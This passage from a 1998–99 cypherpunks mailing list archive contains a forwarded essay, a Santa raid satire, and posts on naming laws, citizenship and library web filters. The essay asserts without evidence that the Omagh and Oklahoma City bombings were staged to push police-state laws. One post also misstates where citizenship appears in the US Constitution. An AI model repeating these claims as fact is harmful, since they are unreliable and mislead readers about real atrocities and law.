     commerce and trade is the emphasis on external capital investment
     =97 funds which are invested in an enterprise for the purpose of
     increasing the value of the investment. In particular capitalism
     is characterised by stock corporations, where ownership shares in
     a business can be bought and sold.

     Stockholders are technically the owners of an enterprise, but the
     interests of stockholders are not the same as the interests of an
     owner who also operates an enterprise. An owner-operator is
     concerned with operating a healthy business and developing it
     over time. He or she might be interested in growing the business,
     or might just as well be happy for it to stabilise at some
     manageable size and then bring in a stable ongoing profit. But a
     capitalist, an external investor, is interested solely in the
     growth of the business, which is what increases the value of the
     stock investment. A stable business translates into stagnant
     stock values; a business which is merely profitable is not a good
     place for capital investment.

     One can compare a corporation =97 or any investment vehicle =97 to a
     taxicab, and an investor to a rider. The operator of a taxicab is
     concerned with keeping the vehicle in good repair and making a
     regular profit over time. A rider, on the other hand, is only
     concerned with his own use of the vehicle. If the rider gets to
     his destination on time, he has little concern over whether the
     vehicle is damaged in the process. Similarly a capital investor
     uses an investment vehicle. Only a period of growth is required
     by the investor. If the vehicle then falters, investors simply
     sell their shares and reinvest elsewhere. The history of
     capitalism is indeed strewn with the carcasses of boom-and-bust
     corporations, industries, and whole economies.

     In a capitalist economy there is a pool of capital =97 the sum of
     all the money investors are making available. Just as water seeks
     its own level, so this ever-growing capital pool always seeks the
     best available growth opportunities. And just as water over time
     can wear down the highest mountain, so the relentless pressure of
     this growth-seeking capital pool eventually creates an economy
     and society in which growth is the dominant agenda. External
     ownership =97 the separation of ownership from operation =97 is the
     origin of the growth imperative in a capitalist economy.

     The evolution of capitalism proceeds according to the following
     dynamic. In each phase of its development capitalism operates
     within a larger societal regime =97 a particular political,
     cultural, technological, and economic environment. Within this
     regime, under the relentless pressure of the investment pool, the
     various investment vehicles are exploited to the maximum
     practical degree. There always comes a point where further growth
     of the pool becomes problematic or impossible. When such a
     societal growth barrier is encountered, the creative energy of
     capitalism is unleashed on a new objective: changing the
     surrounding societal regime.

     There is thus a characteristic rhythm to capitalist evolution.
     Periods of growth within a regime are punctuated by changes of
     regime designed to create a new period of growth. A new societal
     regime might be characterised by technological changes (the
     Industrial Revolution), by political changes (creation of
     republics), or by new societal projects (imperialism.) Driven by
     its relentless growth imperative, capitalism has become the
     driving force behind societal evolution wherever it has taken
     hold.

     Apologists for capitalism call such societal changes "progress"
     and emphasise whatever real or imagined beneficial qualities
     might be present. In fact such changes have been designed by
     human creativity yoked to the objective not of societal
     improvement, but to that of creating new investment vehicles for
     the ever-voracious capital pool. In fact the intentional
     destruction of societies and economies, particularly but not only
     in colonised nations, has been a technique frequently employed to
     create new investment vehicles.

     One of the most important and characteristic societal
     developments brought about by capitalism is the rise of
     capitalist elite oligarchies. Given that the evolution of
     capitalism proceeds through an ongoing series of intentional
     societal changes, it is only natural that the mechanisms of
     societal control would themselves evolve over time and eventually
     be consolidated into political domination by a capitalist elite.

          People of the same trade seldom meet together... but
          the conversation ends in a conspiracy against the
          public, or in some contrivance to raise prices.
          =97 Adam Smith, Wealth of Nations

     In every society where capitalism has taken hold, a dominant
     capitalist oligarchy has in fact emerged, along with the
     establishment of institutions designed to further elite interests
     in a systematic way. Today, the United States itself has become a
     vehicle for managing world events so as to facilitate investment,
     to make the world safe for capitalism. Transnational corporations
     (TNC=92s) have evolved into gigantic engines for generating capital
     growth, and TNC-dominated bureaucracies (International Monetary
     Fund (IMF), World Trade Organisation, et al) are being given
     global decision-making power over a wide range of issues, loosely
     called economic =97 and those institutions are rapidly becoming in
     all but name a world government.

     Global capitalism today is coming up against several constraints,
     and globalisation, in its full NWO dimensionality, can be seen as
     the creative attempt by very competent, corporate-funded planners
     to overcome those constraints. One of the constraints comes from
     the very global success of capitalism =97 there is no longer any
     possibility of growth through territorial expansion. Other means
     of growth =97 and many have been perfected over the years =97 must b=
e
     deployed.

     In Southeast Asia, in Africa, and in the former Soviet Union, the
     policies of Western finance capital and of its tool, the IMF,
     have created capital-growth vehicles through the intentional
     destruction of once healthy economies. In South Korea, for
     example, Western over-investment was followed by the sudden
     withdrawal of funds and credit. Thus a financial bubble was
     created, and when it burst the South Korean currency was
     destroyed and the national finances were depleted.

     In desperate need of finance, South Korea was forced to turn to
     the IMF. The IMF then came forward with one of its infamous
     "restructuring" programs which in truth should be called
     "demolition" programs. Sound businesses that had been thriving
     only weeks before were forced into bankruptcy; South Korea was
     forced to change its social and labour policies from top to
     bottom; the systems were dismantled which had been responsible
     for South Korea=92s postwar economic success.

     These so-called IMF "reforms" which were forced on South Korea
     had nothing to do with the causes of the financial collapse. Not
     only that, but the IMF "rescue funds" did not go to South Korea
     at all, but were rather used to repay the external investors
     whose market manipulations had caused the collapse. While Western
     taxpayers fund the IMF, and Southeast Asian (and other)
     populations suffer the consequences of IMF policies, it is
     Western capital that reaps all the benefits.

     What were the benefits reaped by Western capital? To begin with,
     the IMF bailout of the investors means that Western capital was
     first able to profit from the decades of South Korean growth, but
     was then protected when the bubble burst. Global capitalism has
     been called "casino capitalism", and the IMF makes sure that the
     big players cannot lose in this game, no matter which cards turn
     up.

     But that was only the beginning. To understand the primary
     benefit derived from destroying the South Korean economy, we must
     note that capitalism is currently suffering from what is called a
     "crisis of over-production". The efficiency and size of TNC
     producers have evolved to the degree where much more can be
     produced than can possibly be consumed. In automobiles,
     electronics, and many other industries there are simply too many
     producers chasing too few consumers.

     Interventions such as in South Korea and the former Soviet Union
     have become a systematic mechanism to selectively cull global
     competitors, thus creating growth room for those that remain. In
     addition, the assets and productive capacity of the victims have
     been made available at bargain prices for purchase by Western
     interests.

     This selective destruction of economies is a "regime change" in
     the global society, designed to create growth vehicles for the
     Western capital pool. Elimination of producers creates growth
     room in the global economy for Western operators; bargain
     purchase of assets increases monopoly concentration of global
     commerce in Western hands; destabilised societies are forced to
     import what they formerly produced for themselves, further
     increasing Western capital-growth opportunities.

     One of the myths of globalisation is that it represents a
     relative decline of Western interests, that market forces will
     allow other regions to make inroads against traditional Western
     domination. With the postwar economic rise of Japan and later
     Southeast Asia, this myth in fact gained considerable
     credibility. But as the postwar boom began to level out, and a
     new regime of growth became necessary, it has become clear that
     the global capital elite remains primarily a Western elite. The
     IMF is in fact dominated primarily by Western-based interests,
     and its power has been used to selectively cull non-Western
     operators.

     While the IMF culls competitors using the power of the purse
     strings, the US and NATO accomplish the same objective in other
     ways. In the case of the petroleum market, where limiting supply
     is crucial to maintaining desired global oil prices, geopolitical
     machinations have been employed to restrict at various times the
     production of Iran, Iraq, Libya, and others. By encouraging the
     split-up of Yugoslavia, which competed in several world markets
     including automobile production, additional culling was
     accomplished.

     As capitalism enters its global era, it is doing so under the
     control of the Western capitalist elite. This elite dominates the
     leading Western nations politically, even more firmly controls
     the foreign policies of those nations, and totally controls the
     policies of the IMF, the World Bank, and the other institutions
     of the global governmental apparatus. All the potent agencies
     which determine the course of global societal evolution are
     firmly in the control of the Western elite.

     But in another sense the decline of the West is not myth but
     reality. Western elites remain in firm control and continue to
     prosper under globalisation, but Western societies are in fact in
     decline =97 economically, culturally, and politically. This decline
     is intentional, planned and implemented by the capitalist elite
     as a societal change designed, as always, to create growth
     vehicles for the capital pool.

     This particular episode of Western societal engineering is called
     the "neoliberal revolution" and it was formally launched with the
     candidacies of Ronald Reagan in the US and Margaret Thatcher in
     the UK, and with the adoption of the Maastricht Treaty in Europe.
     The agenda of the neoliberal revolution is summed up in the
     all-too-familiar mantra "free trade, deregulation, privatisation,
     and reform". The true meaning of this agenda can be easily found
     by analysing each transaction in terms of its consequences for
     capital growth.

     Free trade, whose practical definition must be inferred from the
     terms of the international free-trade agreements, in fact means
     the elimination of national sovereignty over the flow of capital
     and goods. The consequence is that TNC=92s have more flexibility in
     optimising production and distribution, and in exploiting the
     opportunities created by the culling of competitors. This
     flexibility is the growth vehicle provided by the free-trade
     plank of the neoliberal platform.

     Deregulation refers to the elimination of national sovereignty
     over corporate concentration, capital movement, corporate
     operations, pricing, and product standards. Again the benefit is
     clear. Greater freedom in concentrating ownership, shifting
     capital, operating without environmental or other restraints,
     raising prices, and reducing standards =97 these all provide
     vehicles for growth in this neoliberal phase of capitalism in
     Western economies.

     Privatisation refers to the sale of national assets to corporate
     operators and the transfer of control over national
     infrastructures to those operators. Each such transfer creates an
     immediate growth vehicle for capital, in the exploitation of the
     asset and the infrastructure. In addition the transfers have been
     in fact sweetheart deals where negotiators on both sides of the
     transactions have represented the interests of the same
     capitalist elite. Asset values have been heavily discounted,
     through various tried-and-true trickeries of accounting, and the
     "sales" have in fact represented immediate transfers of wealth
     from public ownership directly into corporate coffers. The sale
     transactions themselves are growth vehicles.

     Reform, besides referring to generic compliance with the
     neoliberal agenda, also means reducing the taxes of corporations
     and the wealthy, eliminating social services, and generally
     cutting back the functions of government. Obviously these tax
     changes serve to grow the capital pool. The elimination of social
     services also serves as a growth vehicle in two ways. Workers
     become hungrier for employment, creating a downward pressure on
     wages. New enterprises can be started in order to provide the
     services formerly provided by government (medical care,
     insurance, etc).

     The general cutting back of government functions is simply part
     of the sovereignty transfer from national governments to the
     centralised regime of global institutions. As power and
     administration is concentrated globally, the role of national
     governments is being reduced and refocused. As has been long true
     of governments in much of the Third World, the role of Western
     governments is devolving toward three major functions: conforming
     to the dictates of the global regime, making payments on the
     national debt, and controlling the domestic population. The
     paramilitarisation of police forces, the rise in prison
     populations, and the extension of police powers are very
     necessary societal changes required to enable the full
     implementation of the neoliberal agenda.

     It is no accident that in the USA, where the neoliberal agenda
     has been most thoroughly implemented, the collateral police-state
     apparatus is also most thoroughly deployed. SWAT teams, midnight
     raids, property confiscations, mandatory and draconian
     sentencing, a booming prison-construction industry, increased
     surveillance and monitoring of individuals and organisations =97
     these are all an increasing part of the American scene.
     Government officials have stated that Americans must expect even
     more dramatic security measures, and that military vehicles and
     weapons can be expected in domestic situations where warranted by
     security concerns.

     The neoliberal agenda in fact amounts to the dismantlement of
     Western societies, undoing what was in some sense many decades of
     social progress. Although the dominant global elite remains based
     in the West, strong Western societies are no longer required
     under the global regime, as they were in the era of competitive
     nationalism. Just as the IMF devastates non-Western societies in
     ways that provide growth vehicles, so the neoliberal revolution
     devastates Western societies for the same purpose, if at a
     somewhat more gradual pace. Police-state regimes, whether or not
     acknowledged by that name, are an inevitable necessity if Western
     nations are to be kept in line as the neoliberal dismantlement,
     which is still in its early days, continues to unfold.

     2. Exporting the Police State: Ireland and the Omagh Bombing

     I=92ve been living in the UK and Ireland for over four years. I=92ve
     been observing the peace process and the tactics of the various
     sides, including several Irish Republican Army (IRA) bombings.
     While by no means condoning violent methods, I have been
     nonetheless impressed by the care that went into the planning and
     execution of most of the IRA=92s operations.

     Huge bombs were set off in London, in the heart of the financial
     district and at the Docksides complex, causing immense property
     damage and embarrassment to British officials, with surprisingly
     little injury or loss of life. Without approving of violence, one
     can still acknowledge that the IRA has, at least in recent years,
     been politically astute in their (nonetheless unjustifiable)
     operations.

     The Omagh bombing was totally out of character; it made no sense
     whatsoever within the political context of Northern Ireland and
     the progress of the peace process. Certainly there are dissident
     elements who aren=92t satisfied with the compromises that have been
     reached, but accommodations have been made to all sides, and the
     overwhelming spirit in both North and South is to reach a
     settlement and put the "troubles behind us".

     The Omagh bombing was the most deadly of the entire 30-year
     "troubles". It was out of character not only by its timing, but
     also in terms of its scale. My first response on hearing of it
     was "Where did this come from?" It seemed to have come from out
     of the blue, totally unrelated to the Irish context. It felt like
     one of the "staged dramatic incidents" that we reviewed in the
     previous instalment of this Indictment (see New Dawn No. 48).
     Suspicious, I waited for the other shoe to drop.

     I didn=92t have to wait long. The headline on page seven of the
     Irish Times for September 1st reads: "Harsh measures =91regrettably
     necessary=92 to fight terrorism." Here we read of a fourteen-point
     anti-terrorism bill that is, in its essentials, copied directly
     from the police-state provisions that have been adopted in
     varying degrees by the US and Britain.

     A suspect who refuses to answer questions, can have his silence
     used against him. The silence itself can be "inferred" as being
     corroborating evidence against the suspect. The right to trial by
     jury becomes little more than a sham: if the suspect doesn=92t
     confess all, he either opens himself to perjury (by lying) or
     else builds, through silence, an "inferred" case against himself.

     The validity of trial by jury is further undermined by a another
     provision, which requires the defense to announce to the
     prosecution, in advance of a trial, all witnesses it is going to
     call. Thus the prosecution is armed in advance with the strategy
     of the defense, much to its advantage. And witnesses are exposed
     to possible harassment leading up to the trial, the fear of which
     could have a chilling effect on their willingness to testify.

     As if that weren=92t enough, a suspect is expected to divulge,
     under police questioning, every bit of evidence that he might
     rely on in his defense. Otherwise "inferences" can be drawn. The
     very vagueness of "inferences" still further extends the power of
     the state over that of the accused in what has become a mockery
     of a criminal trial.

     The "conduct" of an accused =97 by which he can be judged guilty =97
     is re-defined to include "movements, activities, actions or
     associations". The critical word here is "associations". If you
     can be proved to be a member of an organisation, and if that
     organisation engages in illegal acts, then your mere association
     makes you to some degree a party to the acts. This provision
     establishes in Ireland what in the US are known as conspiracy
     laws. Such laws, in conjunction with agent provocateurs, can be
     used to suppress popular organisations which legitimately and
     legally oppose government policies.

     Just as the US President, under police-state provisions, can
     declare any organisation to be a "terrorist organisation", so can
     the Irish government "suppress" any organisation under the 1939
     "Offences Against the State" act. The new "regrettable measures"
     of the anti-terrorism bill extend considerably the power of the
     state to succeed in suppressing any organisation it decides it
     doesn=92t like.

     Under the charge of "directing an unlawful organisation", one can
     receive life imprisonment. "Directing", it turns out, means
     directing the activities of the organisation "at any level".
     Thus, if an organisation has been officially "suppressed", all of
     its leaders down to the precinct level can be rounded up and put
     in prison with the key thrown away =97 simply for being leaders,
     and even if the organisation is engaged in no illegal activity.

     Under the charge of "unlawful collection of information" one can
     be imprisoned for up to 10 years. If you have maps and lists of
     people, perhaps to support political organising, and the
     prosecutor says you were planning a terrorist network, it is up
     to you to prove he=92s wrong. Again trial by jury is made a
     mockery. Instead of the state proving its case beyond a
     reasonable doubt, it is up to the accused to prove they aren=92t
     guilty.

     During thirty years of troubles such anti-terrorist provisions
     were not considered necessary. Then on the very eve of final
     settlement a mysterious, uncharacteristic "incident" occurs in
     Omagh, and with suspicious suddenness the Irish government comes
     up with an anti-terrorism bill which mimics the "latest
     developments" in the police-state provisions of the US and
     Britain.

     The parallels between the Oklahoma City and Omagh bombing
     scenarios are striking. Both were unprecedented in their scale of
     death and injury; neither made any sense in terms of being a
     "political statement" for any group or organisation; the
     circumstance of both were highly suspicious; both were
     immediately followed by the passage of omnibus anti-terrorism
     bills without debate.

     Summary

     The pattern, then, is clear. The US leads the way in the
     development of police-state measures and of the means to get them
     implemented without debate. The measures are then exported to
     other countries by the tried-and-true method of staging dramatic
     incidents. Globalisation is a very systematic process, as we have
     seen in the pattern of IMF interventions, and as we can see in
     the establishment of global governing institutions. It is no
     surprise that a systematic means have been developed to implement
     the police-state regimes which are required to fulfill the aims
     of the neoliberal revolution.

     The evidence, ladies and gentlemen of the jury, is clear. Our NWO
     elite leaders are committed to the program of corporate
     globalisation. They are compelled to this strategy by the need to
     keep their capital pool growing. Reducing Western populations to
     Third-World status is a necessary part of their plans for the
     globalisation of the economy and the consolidation of all power
     in their centralised bureaucracies. The installation of
     police-state regimes is being purposely pursued in order to force
     this elite program on Western populations.

     I suggest to you that the only reasonable verdict is "guilty as
     charged", and that the sentence should be the overthrow of the
     capitalist elite oligarchy, through non-violent democratic
     revolution, and the replacement of the capitalist system by one
     more appropriate to human happiness and well-being.

     I thank you for your attention and invite you to go forth and do
     your duty as free men and women to secure the future of the Earth
     and of your progeny.

     Recommended Reading (alphabetical order):

     William Blum, Killing Hope, US Military and CIA Interventions
     Since World War II, 1995, Common Courage Press, PO Box 702,
     Monroe, ME 04951, USA.

     Michel Chossudovsky, The Globalisation of Poverty, 1997, Third
     World Network, 228, Macalister Road, 10400 Penang, Malaysia, fax
     60 4 226 4505.

     Richard Douthwaite, The Growth Illusion, 1992, Lilliput Press,
     Dublin.

     William Greider, Who Will Tell the People =97 the Betrayal of
     American Democracy, 1993, Simon and Schuster.

     Samuel P. Huntington, The Clash of Civilizations and the Remaking
     of World Order, 1997, Simon and Schuster.

     V.I. Lenin, Imperialism, the Highest Stage of Capitalism, 1939,
     International Publishers Co.

     Jerry Mander and Edward Goldsmith (editors), The Case Against the
     Global Economy and for a Turn Toward the Local, 1996, Sierra Club
     Books, San Francisco.

     Richard K. Moore, Globalization and the Revolutionary Imperative,
     a book-in-progress available online at
     http://cyberjournal.org/cadre/gri/gri.html

     Michael Parenti, Make-Believe Media =97 the Politics of
     Entertainment, 1992, St. Martin=92s Press, New York.

     David Wise, The American Police State, 1973, Vintage Books.

     Previous parts of Richard Moore=92s Police State Conspiracy =97 An
     Indictment were published in New Dawn Nos. 46, 47 & 48.

     [Image]
     Richard Moore, an expatriate from Silicon Valley, currently lives
     and writes in Wexford, Ireland. He currently runs the
     Cyberjournal "list" on the Internet. Email: rkmoore@iol.ie, FTP:
     ftp://ftp.iol.ie/users/rkmoore/cyberlib   Address: PO Box 26,
     Wexford, Ireland.

- --------------5E5047714EA--


- -> Send "subscribe   snetnews " to majordomo@world.std.com
- ->  Posted by: "Mark A. Smith" <msmith01@flash.net>


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 1 Jan 1999 08:36:40 +0800
To: cypherpunks@cyberpass.net
Subject: Northpole Standoff
Message-ID: <v04020a0bb2b1c1ed41f1@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 31 Dec 1998 15:28:40 -0800
To: rah@shipwright.com, Other People...
From: Somebody
Subject: Northpole Standoff


Dec. 23, 1994
Northpole Standoff

A fierce battle ended in a stand-off today as a multi-jurisdictional task
force of federal law enforcement agents tried to arrest the leader of a
militant doomsday cult, who call themselves "Elves," living in a heavily
fortified compound at the Northpole. According to witnesses, federal agents
hid in livestock trailers as they drove up to the compound.

The approach was difficult in the snow using wheeled vehicles. Several
agents were reportedly thrown from the trailer when it hit a snowbank. The
agents were unable to use dog teams and sleds because the ATF agents shot
all the dogs during training at a nearby recreational facility where agents
had practiced for weeks on a mock-up of the compound in preparation for the
raid.

As three National Guard helicopters approached, over 100 law officers
stormed the main compound, a heavily fortified gingerbread structure,
throwing concussion grenades and screaming "Come out!" Cult members and law
officers negotiated a cease-fire about 45 minutes after the incident began.

For the next several hours, ambulances and helicopters swarmed the
premises. The area was cordoned off and ATF agents with machine guns were
posted in the roadways to keep reporters at least two miles from the main
battle area.

In a lengthy report on the group Saturday, The Northpole Tribune-Herald
said that the cult was known to have a large arsenal of high-powered
weapons, probably produced in a workshop disguised as a "toy factory." This
toy factory is also believed to be the sight of a mephamphetamine
laboratory, according to sources inside the ATF.

The article quoted investigators as saying the crazed cult leader, who uses
several aliases, "Santa Claus," "Saint Nick," "Sinterclaas," and "Saint
Nicholas," age unknown, has abused children and claims to have at least 15
wives. Santa Claus denies these accusations of abuse and said he has had
only one wife, Mrs.
Santa Claus.

Authorities had a warrant to search the Northpole compound for guns and
explosive devices and an arrest warrant for its leader, Santa Claus, said
Mess Stanford of the Bureau of Alcohol, Tobacco and Firearms in Washington,
D.C. Mr. Stanford added it would be useless to attempt to get a copy of
this warrant, however, because it had been sealed, "for national security
reasons."

The assault came one day after the Northpole Tribune-Herald began
publishing a series on the cult, quoting former members as saying the
deranged cult leader, Santa Claus, abused children and had at least 15
wives.

ATF spokesman Jack Killchildren in Washington said the assault had been
planned for several weeks, although he added, "I think the newspaper's
investigation set up heightened tension."

The cult's fortress, called "The Toy Factory," is dominated by a tower with
lookout windows facing in all directions. Guards reportedly patrol the
77-acre grounds at night.

Attorney General Janet Reno ordered the raid after cult members refused to
surrender documents relating to national security. A source inside the
Justice Department said that the documents were lists of cabinet members
and highly placed government officials who were naughty or nice. Despite
preliminary, secret negotiations to obtain the list, the Elves refused to
surrender the document to the Justice Department.

The raid was scheduled for December 23, because December 25 is believed to
be a traditional cult holiday and all the militant elves would be engaged
in cult rituals in preparation for the event.

At a press conference this afternoon, Attorney General Reno said, "These
militants abuse children in the most vile manner, by teaching them to
expect charity. They have even distributed free, working replicas of
'assault weapons' and 'handguns.' It is a matter of dire importance to our
future and the future of all our children, that this peril be ended by
every means at our disposal."

She went on to say that "I do not want to surround the compound and shoot
everyone and then burn it to the ground in order to prevent this child
abuse from occurring again, but that appears to be our only alternative."

According to Reno, the "Toy Factory" itself is a sweatshop and conditions
inside were horrendous. The Department of Justice is also looking into
allegations of animal cruelty. Former members of the cult have claimed that
Santa Claus frequently uses leather restraints on at least eight reindeer,
housed in sordid conditions on the compound. Witnesses reported seeing a
reindeer with a protruding red nose, which Janet Reno said was further
indication of the abusive conditions inside the compound.

Several of the elves were reported by the BATF to have been carrying
automatic weapons. However, independent sources dispute this, claiming that
the "automatic weapons" were nothing more than large candy canes.

ATF leader Ted Oyster, shaken after the ordeal, spoke to reporters as
hundreds of agents, many of them in tears, were taken away from the
Northpole in military airlifts, ambulances, and private vehicles.

"We had our plan down, we had our diversion down, and they were waiting..."
Oyster said resignedly, shaking his head.

A hospital spokesman said that most of the wounded ATF agents appeared to
be suffering from shrapnel wounds from broken candy canes, as well as
frostbite, apparently suffered from wearing forest-green camouflage in the
wintry terrain.

Attorney General Reno offered no comment on these reports.

Mack "the knife" McWarty was seen strolling across the White House lawn,
chuckling to himself as he read what inside sources say was a copy of the
naughty/nice list.

One highly placed government official was found dead in Marcy Park. His
name and the cause of death are unknown at this time, however, the White
House immediately issued a statement claiming the official had committed
suicide after learning his name was not on the nice list.

Patsy Thomahawk refused to comment on the advice of her attorney on whether
she had any part in removing copies of the naughty/nice list from a safe in
the White House.

A spokesman from the MJTF said that it was indeed a tragedy that Santa
Claus had caused this confrontation, but this should be a lesson to anyone
who tries to give to everyone without permission from the welfare
department, and that gathering sensitive data without a permit from
official sources will be stopped by any means.

FBI spokesman Bob Pricks, the former national Abortion Poster Child of
1944, relayed that "We are dealing with a madman. We have cut off all
electricity, water, and communications to the compound.

Santa Claus has demanded that we relay a message to the world. It reads,
'Merry Christmas to all and to all a good night.' FBI psychological experts
are presently analyzing the message, however, preliminary reports indicate
this is an encrypted threat to invade the neighboring towns near the
Northpole. It may also be a doomsday message that the cult intends to
commit suicide, like Jonestown."

Shortly after the raid, a smiling Reno was seen strolling through the pile
of rubbish looking for anatomically correct Barbie dolls. She claimed that
she was going to confiscate any that she found as "evidence" and that they
were for a personal investigation that she was conducting.

Attorney General Reno also disclosed some information about plans to raid
Mr. E. Ster Bunny sometime next spring. According to the FBI's report on
Mr. Bunny, he has been hoarding food all year. This is in direct violation
of a secret Presidential Directive. "This ingratitude for everything that
we have done will stop, even if it means raiding every house in the USA to
enforce these new laws that were made to insure your freedom...." Reno
said.

This, boys and girls, should make us all sleep just a little bit better
tonight. The government will protect us from overindulging in freedom. If
they didn't step in and take control of that "naughty/nice" list, just
think what shape we might be in.....
*****


<somebody's .sig>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 1 Jan 1999 12:14:14 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: Norway - go to jail for naming baby illegal [CNN]
In-Reply-To: <D104150098E6D111B7830000F8D90AE84DDFDB@exna02.securitydynamics.com>
Message-ID: <v03130300b2b1f5a4bc07@[209.66.101.226]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:59 PM -0800 12/31/98, Reeza! wrote:

>THAT is _almost_ understandable. You say that Iceland requires immigrants
>to change their names to Norse ones, you didn't say to Norse ones on the
>approved list. or Norse ones avoiding those on the disapproved list. Does
>Iceland have the same "children who are born here are Icelandic citizens,
>regardless of the nationality of the parents" provision of the US
>constitution?

Is that written into the Constitution? I wasn't aware of that. If so, I
will have learned something new tonight, perhaps the last major new thing I
learn in 1998.

There is talk of changing this law (or, I suppose, item in the C.) which
allows and even encourages pregnant Mexicans and Salvadorans and
Guatemalans to sneak into the U.S. just in time to have their babies in an
American hospital, thus making the children American citizens (and mustn't
separate mother from child, right?).

Israel of course has laws allowing anyone born of a Jewish mother to
"return" to Israel...never mind that they may have essentially no genetic
content of any ancestor who ever lived in Palestine, even the Palestine of
3500 years ago.

Ireland has a fairly new law which allows anyone with any Irish born
grandparents or parents to get Irish citizenship.

(Both Israel and Ireland, and presumably other places, would like to
encourage wealthy Americans to relocate.)

>About the only place I can think of where prohibiting certain names might-
>might be justifiable, is in countries where the names of certain criminals
>are associated with crimes of such heinous magnitude that it would create
>an emotional burden the viable tissue mass would never be able to overcome.
>'Adolf Hitler' Xxxxxx, 'Charles Manson' Yyyyyy, or 'Hannibal Lector' Zzzzz,
>(heh) for example. It's just another case of jingoism (maintaining their
>culture re: populace naming conventions) and religious persecution (the
>babies name is hebrew, the mother of 10 claims christianity for her own),,,

It is not the function of a legitimate government to pass laws to stop
"emotional burdens" on children. If it were, then various religions which
expose the children of practicitioners to ridicule would be candidates for
banning.


As with so many things, Reeza!!, you need to carefully think about these
political issues. Frankly, from the views you often express, I wonder why
you support freely available unbreakable and untraceable communications.

--Tim May




We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Fri, 1 Jan 1999 04:13:22 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@Algebra.COM>
Subject: Englewood seeks limit on Net sex sites
Message-ID: <368BE358.BC07E252@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Seems this stuff is now in my own back yard.

If anyone wants to talk to the people involved,
go here: http://www.ci.englewood.co.us/



http://www.denver-rmn.com/news/1231filt4.shtml

> Englewood seeks limit on Net sex sites 
> 
> Program to curb access of children at libraries 
> 
> Associated Press
> 
> 
> ENGLEWOOD -- The Englewood Public Library will
> be the first in Colorado to try a new technology
> strictly limiting children's access to sex sites
> on the World Wide Web. Mayor Tom Burns said the
> city and its librarians have no intention of
> censoring the Internet, and the Guardiannet
> program can be cancelled after a 30-day test run
> if it doesn't work out.
> 
> Starting in April, all of the library's Internet
> users will need a plastic "Smart Card" to go
> online. The cards will be coded to indicate
> whether children under 18 have their parents'
> permission to full access or should be restricted
> to the limited database of 5,000 child-friendly sites.
> 
> "It's a solution that allows parents to make
> the decision, rather than the institution," said
> City Manager Gary Sears.
> 
> However, Sears said the move could invite
> lawsuits from civil rights groups that may
> view the city's decision as censorship. The
> move also comes amid national debate
> among librarians on whether blocking systems
> constitutes censorship and violates First
> Amendment rights.
> 
> Jamie LaRue, president of the Colorado Library
> Association, called Internet restrictions
> "a tricky issue."
> 
> "When I was a little boy ...I knew what was
> wrong," LaRue said. "The part that bothers
> me is that we are using technological
> inventions to replace civility and conscience in
> what is in fact an ethical problem."
> 
> The Englewood City Council voted 5-2 to
> approve the $108,000 contract with
> Guardiannet, even though the library
> board recommended against it.
> 
> Councilwoman Lauri Clapp said it will give
> the library the needed tools to help parents
> protect their children. City Councilwoman
> Alex Habenicht opposed the measure.
> 
> December 31, 1998 

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 1 Jan 1999 12:35:55 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Norway - go to jail for naming baby illegal [CNN] (fwd)
Message-ID: <199901010425.WAA09537@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 31 Dec 1998 19:57:17 -0800
> From: Tim May <tcmay@got.net>
> Subject: RE: Norway - go to jail for naming baby illegal [CNN]

> At 5:59 PM -0800 12/31/98, Reeza! wrote:
> 
> >THAT is _almost_ understandable. You say that Iceland requires immigrants
> >to change their names to Norse ones, you didn't say to Norse ones on the
> >approved list. or Norse ones avoiding those on the disapproved list. Does
> >Iceland have the same "children who are born here are Icelandic citizens,
> >regardless of the nationality of the parents" provision of the US
> >constitution?
> 
> Is that written into the Constitution? I wasn't aware of that. If so, I
> will have learned something new tonight, perhaps the last major new thing I
> learn in 1998.

	No Person except a natural born Citizen, or a Citizen of the United 
States, at the time of the Adoption of this Constitution, shall be eligible 
to the Office of President; neither shall any Person be eligible to that 
Office who shall not have attained to the Age of thirty five Years, and been 
fourteen Years a Resident within the United States. 

The first sentence is normaly considered the legal standard that is being
referenced here. It's the only place in the Constitution that refers to how
one actualy gains citizenship. There are apparently three (one unmentioned)
ways:

 1.	natural born (ie being physicaly born on US soil) is the highest
        measure of 'American' citizenship

 2.     being a citizen of the US at the time of ratification

 3.     Unementioned, but implied by the stipulation of 1. for the
        office of president. The intent is commenly held that this
        prevents foreign nationals of long-standing from bringing
        foreign influence into the office. Implicit is that the
        legislature set relevant standards.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
